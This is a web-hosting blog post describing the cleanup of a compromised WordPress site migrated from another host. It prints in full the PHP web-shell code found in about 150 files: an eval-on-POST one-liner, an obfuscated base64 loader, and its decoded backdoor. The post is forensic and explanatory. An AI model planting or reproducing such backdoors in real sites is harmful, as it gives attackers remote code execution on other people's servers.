Hack and Hack again

Tags


Every month I spend a small portion of time repairing an exploited website. These are usually web sites we have migrated from another hosting provider where our new client had constant issues and little to no support from the previous hosting company. In frustration they sought out our services and we moved the site free of charge into one of our managed hosting server.

Now the fun starts..

When we do a site migration we move everything across and sort out what is a live working site and what is legacy and obsolete. Since most sites we bring across are WordPress we often drop their themes and plugin into an updated WordPress core or we run the core upgrade after migration (and a fresh full backup) so its on the latest version with a more recent PHP version. If the site works then all is well and we continue checking theme code and plugins. If it doesn’t we look through error logs and let the client know the bad news.

The other task we perform is to do a series of file scans looking for exploits and almost all the sites we bring across have several files with an exploit. Today a site came across and almost 150 files were compromised! To cut to the chase, two of the plugins were bogus and provided an easy entry point. So as I explored the files I noticed several had a different exploit, I also spotted something odd, exploit code in front of other, unrelated exploit code. Below is the single line code snippet I found in 150 files:

<?php @eval($_POST[‘dd’]);?>

I’ve written about reverse engineering exploits before and a quick search on this Blog will turn up some, so will a visit to Conetix Web Hosting (who have published some of my other articles) will yield more. Below is a copy of one of the more complex code I found in a number of other files:

<?php
$O00OO0=urldecode(“%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A”);
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};
$OO0000=$O00OO0{7}.$O00OO0{13};
$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O(“JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw==”));
@eval($_POST[‘dd’]);?>

The last line of the exploit is cute, its the exploit common to almost all of the other files, and a decrypt of the exploit that gets called first yields:

$fukq = @$_GET[‘fukq’]; if($fukq == ‘t’){echo(@eval($_POST[‘fuckyou4321’]));exit;}$fukq = @$_GET[‘fukq’]; if($fukq == ‘t’){echo(@eval($_POST[‘fuckyou4321’]));exit;}echo apiRequest();function apiRequest(){ if(@$_GET[‘op’] == ‘check’) { return “connectjbmoveisok”; exit();    }}?>

With the exit() call at the end, the code stops so that means the @eval() call after it never gets called, so the file has been compromised by two different people at different times!… talk about bad luck 🙂

-oOo-